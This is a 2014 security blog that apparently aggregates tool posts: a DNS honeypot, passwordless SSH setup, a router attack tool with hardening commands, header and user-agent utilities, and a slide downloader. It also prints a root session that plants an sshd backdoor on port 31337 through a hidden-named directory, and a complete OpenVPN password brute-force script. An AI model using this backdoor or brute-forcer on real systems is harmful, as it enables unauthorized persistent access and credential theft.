Jan 17, 2014

Honeypot DNS and amplification attacks

Low bandwidth open resolver server to observe DNS amplification attacks automatically, providing IP addresses target.
Warning: the table contain false positives and legitimate domains (ie. google.com, openresolverproject.org etc.).  


Source: http://www.nothink.org/honeypot_dns.php


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: SSH or SCP without password


  1. On the client run the following commands:
    $ mkdir -p $HOME/.ssh
    $ chmod 0700 $HOME/.ssh
    $ ssh-keygen -t dsa -f $HOME/.ssh/id_dsa -P ''
    
    This should result in two files, $HOME/.ssh/id_dsa (private key) and $HOME/.ssh/id_dsa.pub (public key).
  2. Copy $HOME/.ssh/id_dsa.pub to the server.
  3. On the server run the following commands:
    $ cat id_dsa.pub >> $HOME/.ssh/authorized_keys2
    $ chmod 0600 $HOME/.ssh/authorized_keys2
    
    Depending on the version of OpenSSH the following commands may also be required:
    $ cat id_dsa.pub >> $HOME/.ssh/authorized_keys
    $ chmod 0600 $HOME/.ssh/authorized_keys
    
    An alternative is to create a link from authorized_keys2 to authorized_keys:
    $ cd $HOME/.ssh && ln -s authorized_keys2 authorized_keys
    
  4. On the client test the results by ssh'ing to the server:
    $ ssh -i $HOME/.ssh/id_dsa server
    
  5. (Optional) Add the following $HOME/.ssh/config on the client:
    Host server
             IdentityFile ~/.ssh/id_dsa
    
    This allows ssh access to the server without having to specify the path to the id_dsa file as an argument to ssh each time. 
Source: http://csua.berkeley.edu/~ranga/notes/ssh_nopass.html





If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 16, 2014

Tools: ZynOS(TP-LINK TD-W8951ND Router) tool for automated attack on a range of IP


With these scripts you can attack ZynOS routers and modify/extract
anything you want on the target router from extracting ISP username and
password to injecting rogue DNS servers IPs.
 
 
Source: https://github.com/MrNasro/zynos-attacker/ 

How to defense it from kifcaliph's blog
1 >telnet 192.168.1.1
2 Password: <type your router password>
3 Copyright (c) 2001 - 2011 TP-LINK TECHNOLOGIES CO., LTD.
4 TP-LINK> sys server load
5 TP-LINK> sys server access ftp 1
6 TP-LINK> sys server access web 1
7 TP-LINK> sys server access icmp 1
8 TP-LINK> sys server access tftp 1
9 TP-LINK> sys server access snmp 1
9 TP-LINK> sys server access telnet 2
10 TP-LINK> sys server save
11 sys server: save ok


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Bash Script For Checkig HTTP Header for Security

Bash script for checking HTTP headers against securityheaders.com.
git clone https://github.com/niravkdesai/securityheaders.git
chmod +x header.sh
./header.sh

Source: https://github.com/niravkdesai/securityheaders



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 15, 2014

Tools: Python Lib for HTTP Agent Parser

Extracts OS Browser etc information from http user agent string

Features

  • Works on Python 2.5+ and Python 3
  • Fast
  • Detects OS and Browser. Does not aim to be a full featured agent parser
  • Will not turn into django-httpagentparser ;)
 
>>> import httpagentparser
>>> s = "Mozilla/5.0 (X11; U; Linux i686; en-US) AppleWebKit/532.9 (KHTML, like Gecko) \
        Chrome/5.0.307.11 Safari/532.9"
>>> print httpagentparser.simple_detect(s)
('Linux', 'Chrome 5.0.307.11')
>>> print httpagentparser.detect(s)
{'os': {'name': 'Linux'},
 'browser': {'version': '5.0.307.11', 'name': 'Chrome'}}

>>> s = "Mozilla/5.0 (Linux; U; Android 2.3.5; en-in; HTC_DesireS_S510e Build/GRJ90) \
        AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1"
>>> print httpagentparser.simple_detect(s)
('Android Linux 2.3.5', 'Safari 4.0')
>>> print httpagentparser.detect(s)
{'dist': {'version': '2.3.5', 'name': 'Android'},
'os': {'name': 'Linux'},
'browser': {'version': '4.0', 'name': 'Safari'}}
 
 




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Script for download slide image of slideshare and convert it to pdf file

Script for download slide image of slideshare and convert it to pdf file

#!/bin/bash

if [ -z $1 ]
then
        echo "Usage: ./dl-slideshare.sh URL"
        echo "Example: ./dl-slideshare.sh http://www.slideshare.net/bbaskin/malware-intelligence"
        exit 1
fi

savepath="/tmp/slideshare"

if [ ! -d "$savepath" ]
then
        mkdir $savepath
fi
path=`pwd`

name=`echo $1 | grep -Eoi '/[a-zA-Z0-9-]+$' | cut -d/ -f 2`

#listurl=`curl $1 | grep http://image.slidesharecdn.com/.*1024.jpg | awk -F= '{ print $6$7 }' | cut -d' ' -f 1`

##### Create image url
listurl=`curl $1 | grep -Eoi 'data-full.*http://image.slidesharecdn.com/.*1024.jpg\?cb=[0-9]+' | cut -d\" -f 2`

cd $savepath

##### Loop Download List Picture
for i in $listurl
do
        `wget $i`
done

#### Convert all picture to pdf
convert `ls -v` $path/$name.pdf

rm $savepath/*




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 14, 2014

Howto: simplest sshd backdoor ever

I got this code from twitter @kingcorp

# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
# uname -a
FreeBSD BSDPWNED 9.0-RELEASE ...
BSDPWNED# mkdir /tmp/" "
BSDPWNED# ln -sf /usr/sbin/sshd /tmp/" "/su
BSDPWNED# /tmp/" "/su -oPort=31337
BSDPWNED# ssh -lroot -p31337 0
root@0's password: <any password>
Last login: Tue Jan 14 07:24:49 2014 from 127.0.0.1
FreeBSD 9.0-RELEASE (BSDPWNED) #0: Sun Jun 24 21:04:36 CEST 2012
BSDPWNED# id
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator)
 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Jan 12, 2014

Tools: Bruteforce Openvpn Tool

#!/bin/bash
# By Galkan 

openvpn_binary_path="/usr/sbin/openvpn"

function brute_force()
{
   brute_file="`mktemp /tmp/brute_force_openvpn_$USER.XXXXXX`"
 output_file="`mktemp /tmp/brute_force_openvpn_$USER.XXXXXX`"

 rm -f $brute_file $output_file

 user_name="$1"
 password="$2"

 echo "$user_name" > "$brute_file"
 echo "$password" >> "$brute_file"

 $openvpn_binary_path --config $openvpn_config_file --auth-user-pass "$brute_file" > $output_file &
 
 while [ 1 ]
 do
  if [ -f "$output_file" ]
  then
   cat $output_file | grep -q "Options error"
   if [ $? -eq 0 ]
   then
    echo "ERROR: `cat $output_file | grep "Options error"`"
    break
   fi

   cat $output_file | grep -q "SIGTERM\[soft,auth-failure\] received, process exiting" 
   if [ $? -eq 0 ]
   then
    echo "$user_name:$password -> FAILURE"
    break 
   fi

   cat $output_file | grep -q "Initialization Sequence Completed" 
   if [ $? -eq 0 ]
   then
    echo "$user_name:$password -> SUCCESS"
    break 
   fi
  else
   continue
  fi
 done
 
 openvpn_pid="`pidof openvpn`"
 kill -9 $openvpn_pid >/dev/null 2&>1

 rm -f $brute_file $output_file 
}



function main()
{
 dict_file="$1"

 for vpn_file in $openvpn_binary_path $openvpn_config_file $dict_file
 do
  if [ ! -f "$vpn_file" ]
  then
   echo "$vpn_file : Dosyasi Sistemde Bulunamadi !!!"
   exit 3
  fi
 done


 cat $dict_file | while read -r line
 do
  user_name="`echo "$line" | cut -d ":" -f1`"
  password="`echo "$line" | cut -d ":" -f2`"

  result="`brute_force "$user_name" "$password"`"
  echo "$result"

  echo "$result" | grep -Eq "^ERROR"
  if [ $? -eq 0 ]
  then
   break
  fi 
 done
}



if [ ! $# -eq 2 ]
then
 echo "Kullanim: $0 <dict_file> <vpn_config_file>"
 exit 1
else
 dict_file="$1"
 openvpn_config_file="$2"

 main "$dict_file" 
fi 
 
Source: https://raw.github.com/galkan/tools/master/openvpn-brute/openvpn_brute_force.sh 




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Proxyp Multithreaded Proxy Enumeration Utility

Proxyp is a small multithreaded Perl script written to enumerate latency, port numbers, server names, & geolocations of proxy IP addresses.
This script started as a way to speed up use of proxychains, which is why I've added an append option for resulting live IP addresses to be placed at the end of a file if need be.


Source: http://sourceforge.net/projects/proxyp/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |